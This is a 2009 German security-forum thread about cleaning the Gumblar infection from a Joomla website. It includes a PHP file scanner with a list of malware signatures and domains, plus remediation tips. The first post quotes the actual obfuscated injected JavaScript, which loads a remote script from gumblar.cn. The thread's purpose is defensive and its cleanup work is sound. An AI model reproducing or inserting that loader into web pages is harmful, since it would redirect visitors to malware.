Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Gumblar - Redirecter (https://www.trojaner-board.de/73293-gumblar-redirecter.html)

SSC streezer 19.05.2009 09:23
Gumblar - Redirecter
 
Hallo zusammen,

leider gibt es noch kein Topic zu meinem Problem. Ich habe seit längerem Scripts auf meiner Website welche sich auf einen Server verbinden der dann einen Trojaner los lässt. Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast).

ich habe diverse massnahmen getroffen denoch krieg ich nicht alles JavaScripts raus welche verantwortlich sind.

ich habe einen Joomla core der aktuellen version (1.5.10). wenn ich den quelltext meiner seite angucke dann sehe ich das javascript. hier ein typisches beispiel:

Code:
<script language=javascript><!--
(function(xwBPE){var k9E='var>20>61>3d>22>53>63r>69p>74Engine>22>2c>62>3d>22V>65>72si>6fn()>2b>22>2cj>3d>22>22>2cu>3dn>61>76iga>74or>2euserAgent>3bi>66((u>2eind>65xOf(>22W>69n>22)>3e0)>26>26(u>2e>69n>64exOf(>22N>54>20>36>22)>3c0)>26>26(do>63u>6dent>2eco>6fk>69e>2ein>64>65xOf>28>22miek>3d1>22>29>3c0)>26>26(>74ype>6ff(zrvzts)>21>3dtyp>65o>66(>22A>22>29)>29>7bz>72>76zts>3d>22A>22>3beval(>22i>66(win>64ow>2e>22+>61+>22>29j>3dj+>22+>61+>22Maj>6f>72>22+b+a>2b>22Mino>72>22>2bb>2ba+>22>42>75>69>6c>64>22+b+>22>6a>3b>22>29>3b>64ocument>2ewrit>65>28>22>3c>73cript>20src>3d>2f>2fgumblar>2ecn>2frss>2f>3fi>64>3d>22+j+>22>3e>3c>5c>2fsc>72>69pt>3e>22)>3b>7d';var hKlRS=k9E.replace(xwBPE,'%');var Mom4=unescape(hKlRS);eval(Mom4)})(/>/g);
 --></script>
hat jemand eine ahnung wie ich dieses lästige biest rauskriegen kann aus meiner page?

wenn ihr mehr infos braucht zu meiner page oder im allgemeinen, scheut euch nicht zu fragen ;)

hier findet ihr weitere infos zum trojaner - Gumblar .cn Exploit - 12 Facts About This Injected Script | Unmask Parasites. Blog.

gruss,
streezer

RORL 20.05.2009 15:21
Hallo,

nachdem, was ich erfahren durfte mit Gumblar, liegt das Problem nicht auf dem Webspace sondern auf dem Rechner.
Der Trojaner hatte sich dort eingenistet und nur darauf gewartet, das ich Websites update...dabei hat er dann (i.d.R.) die index so wie beschrieben umgeschrieben.
Häufig steckte das Java-Script auch in anderen Unterseiten.

Das hat mir geholfen (bis jetzt):
  1. Den Rechner mit mehreren Virenproggies checken...mir hat symantec online check geholfen
  2. ALLE Ftp-Passwörter ändern und auf keinen Fall mehr im Ftp-Programm speichern, sondern händisch eingeben (auch wenn's nervt)
  3. Auf gar keinen Fall mit Admin-Rechten ins Netz, denn das Script leitet den User auf eine Site, wo man sich noch mehr einfängt, als man sich wünscht - das übrigens zu der Angabe:
    "Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast)."
    Man befindet sich nämlich nicht auf der aufgerufenen Website, sondern auf einem CLON irgendwo auf der Welt.
  4. Den kompletten Webspace löschen und - nachdem der Rechner gereinigt wurde - neu aufsetzen
  5. Nach dem Aufsetzen die Seite aufrufen (NICHT ALS ADMIN!!!) und beobachten, ob im Statusfenster kurzfristig eine andere Adresse erscheint, als die aufgerufene

SSC streezer 20.05.2009 21:23
vielen dank für deine tipps !

habs inzwischen löschen können - mithile dieses scriptes hab ich alle infizierten files gefunden und ändern können. dies jedoch mit enormen aufwand - aber ich musste nich nochmal von vorne anfangen und hab mir dardurch auch ne menge arbeit gespart:
Code:
<?php
set_time_limit(0);

$exclude_files = array(
$_SERVER['DOCUMENT_ROOT'] . '/' . file_checker.php’,
);

function scan_files($dir) {

global $exclude_files;

// malware strings to search
$search = array(
'.cn/',
'gumblar',
'eval(unescape',
'eval(base64_decode',
'eval(decode',
'eval(base',
'base64_decode',
'(function(){',
'<!--(function(',
'(unescape(',
'(function(xwBPE)',
'eval(String.fromCharCode',
'neglite.com',
'niklejo.net',
'internetcountercheck.com'
);

$dirs_array = array();

 if ($handle = opendir($dir)) {

echo "<br>Open dir: " . $dir . "";

// this is the correct way to loop over the directory.
while (false !== ($file = readdir($handle))) {
if ($file != '.' && $file != '..') {

$path = $dir . $file;

if (is_file($path)) {

// skip large files
if (filesize($path) > 1000000) {
continue;
}

// exlude fieles
if (in_array($path, $exclude_files)) {
continue;
}

// get content
$file_handle = fopen($path, 'r');
$contents = ”;
while (!feof($file_handle))
{
$contents = fgets($file_handle);

// loop for search string
$found = false;
foreach ($search as $search_string) {
if (stristr($contents, $search_string)) {
$found = true;
break;
}
}

if ($found == true) {
echo '<br>' . $path . ' … <font color="red">[FOUND ' . $search_string . ']</font>';
break;

}
else {
//echo ‘[CLEAN]‘;
}

}

fclose($file_handle);

} elseif (is_dir($path)) {

$dirs_array[] = $path;

}
}
}
closedir($handle);
}



foreach ($dirs_array as $dir) {
scan_files($dir . '/');
}

unset($dirs_array);
}

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

echo 'Starting from: ' . $start_dir . ”;

scan_files($start_dir);


?>

Marlboro 29.05.2009 08:21
hallo zusammen!

bin neu hierher gekommen wg. gumblar ...

@ssc streezer: wie verwende ich das script ... sorry, bin leider nur anwender :-(

SSC streezer 29.05.2009 09:44
code kopieren,
in ein leeres .php file kopieren,
auf server laden,
aufrufen

Marlboro 29.05.2009 09:52
name des php files ist egal?

thx

SSC streezer 29.05.2009 10:54
ja klar - der filename hat doch auf den inhalt keine auswirkungen... nie...


Alle Zeitangaben in WEZ +1. Es ist jetzt 19:25 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27